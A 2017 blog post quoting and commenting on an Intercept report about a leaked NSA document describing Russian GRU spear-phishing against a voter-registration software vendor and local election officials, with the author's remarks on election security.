THIS IS HOW DEMOCRACY ENDS…

June 7th, 2017


So, this is what I’m readng this morning:

…Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks…

That’s the lede for Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election by Matthew Cole, Richard Esposito, Sam Biddle and Ryan Grim writing for The Intercept.

From where I sit, this is the biggest story from The Intercept, or any news organization, since Edward Snowden. The piece continues:

This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.

The NSA analysis does not draw conclusions about whether the interference had any effect on the election’s outcome and concedes that much remains unknown about the extent of the hackers’ accomplishments. However, the report raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.

Breaking news: Russian President Vladimir Putin lies!

More to the point, the run-up to the election much was said about he unhackability of voting machines which I repeatedly discussed with friends, was never the issue. First Secretary of the Communist Party Josef Stalin famously quipped (attributed to Stalin by his personal secretary Boris Bazhanov in his 1980 memoir—Memoirs of the former secretary of Stalin):

I consider it completely unimportant who in the party will vote, or how; but what is extraordinarily important is this—who will count the votes, and how.

If Uncle Joe were running an election, he wouldn’t care about voting machines, he would go after the far fewer, and more easily tampered with, central machines that actually count the votes.

The NSA has now learned, however, that Russian government hackers, part of a team with a “cyber espionage mandate specifically directed at U.S. and foreign elections,” focused on parts of the system directly connected to the voter registration process, including a private sector manufacturer of devices that maintain and verify the voter rolls. Some of the company’s devices are advertised as having wireless internet and Bluetooth connectivity, which could have provided an ideal staging point for further malicious actions.

As described by the classified NSA report, the Russian plan was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.

But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems [Lower in the story, describes the company this way: VR Systems doesn’t sell the actual touchscreen machines used to cast a vote, but rather the software and devices that verify and catalogue who’s permitted to vote when they show up on Election Day or for early voting. JH], a Florida-based vendor of electronic voting services and equipment whose products are used in eight states [California, Florida, Illinois, Indiana, New York, North Carolina, Virginia, and West Virginia. JH].

The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”

That was Step One. Step Two followed at the end of October.

on October 27, [the Russian government] set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.

The NSA assessed that this phase of the spear-fishing operation was likely launched on either October 31 or November 1 and sent spear-fishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.

According to [Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team], if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. [Emphasis mine, JH]

Nothing, absolutely nothing is more vital to a democracy than the security of the voting process. Tamper with that enough and the democracy becomes a fiction.

Leave a Reply

*
To prove you're a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.
Anti-spam image